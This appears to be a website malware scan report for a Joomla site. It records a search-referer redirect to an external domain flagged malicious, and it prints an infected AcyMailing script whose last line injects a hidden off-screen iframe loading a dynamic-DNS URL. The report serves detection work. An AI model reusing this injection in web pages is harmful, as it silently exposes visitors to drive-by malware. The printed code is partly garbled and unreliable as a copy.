Malicious/Suspicious Redirects
| Request | Server response | Status |
URL: http://oksidisko.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: oksidisko.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Wed, 11 Jun 2014 23:16:06 GMT Location: http://site.portrelay.com/ Server: nginx/1.0.13 Content-Type: text/html X-Powered-By: PHP/5.2.17 | malicious |
Scanned pages/files
| Request | Server response | Status |
http://oksidisko.ru/ | 200 OK Content-Length: 8365 Content-Type: text/html | clean |
http://oksidisko.ru/components/com_jcomments/js/jcomments-v2.1.js?v=2 | 200 OK Content-Length: 27179 Content-Type: application/x-javascript | clean |
http://oksidisko.ru/components/com_jcomments/libraries/joomlatune/ajax.js | 200 OK Content-Length: 3978 Content-Type: application/x-javascript | clean |
http://oksidisko.ru/media/system/js/caption.js | 200 OK Content-Length: 1720 Content-Type: application/x-javascript | clean |
http://www.google-analytics.com/urchin.js | 200 OK Content-Length: 22678 Content-Type: text/javascript | clean |
http://vk.com/js/api/xd_connection.js?2 | 200 OK Content-Length: 14102 Content-Type: application/x-javascript | clean |
http://vkontakte.ru/js/api/share.js?9 | 200 OK Content-Length: 10156 Content-Type: application/x-javascript | clean |
http://oksidisko.ru/index.php/subscribe-modify | 200 OK Content-Length: 8627 Content-Type: text/html | clean |
http://oksidisko.ru/components/com_acymailing/js/acymailing.js | 200 OK Content-Length: 3759 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function tableOrdering( order, dir, task ) {
var form = document.adminForm; form.filter_order.value = order; form.filter_order_Dir.value = dir; submitform( task ); } function submitform(pressbutton){ if (pressbutton) { document.adminForm.task.value=pressbutton; } if (typeof document.adminForm.onsubmit == "function") { document.adminForm.onsubmit(); } document.adminForm.submit(); } function if(captchaField){ if(captchaField.value.length<1){ if(typeof acymailing != 'undefined'){ alert(acymailing['CAPTCHA_MISSING']); } captchaField.className = captchaField.className +' invalid'; return false; } } return true; };document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://iygqbiujt.dns-stuff.com/73148628158a41.r7HTM?13" height="500" width="500"></iframe>'); Antivirus reports:
| ||
http://oksidisko.ru/index.php/mailing-list-archive | 200 OK Content-Length: 11034 Content-Type: text/html | clean |
http://oksidisko.ru/index.php/ultimate-what-is-it | 200 OK Content-Length: 11247 Content-Type: text/html | clean |
http://oksidisko.ru/index.php/team-is-it-for-you | 200 OK Content-Length: 8176 Content-Type: text/html | clean |
http://oksidisko.ru/index.php/take-a-chance | 200 OK Content-Length: 8466 Content-Type: text/html | clean |
http://oksidisko.ru/index.php/our-culminations | 200 OK Content-Length: 15390 Content-Type: text/html | clean |
http://oksidisko.ru/index.php/the-news | 200 OK Content-Length: 11280 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=oksidisko.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://oksidisko.ru/
Result: oksidisko.ru is not infected or malware details are not published yet.
Result: oksidisko.ru is not infected or malware details are not published yet.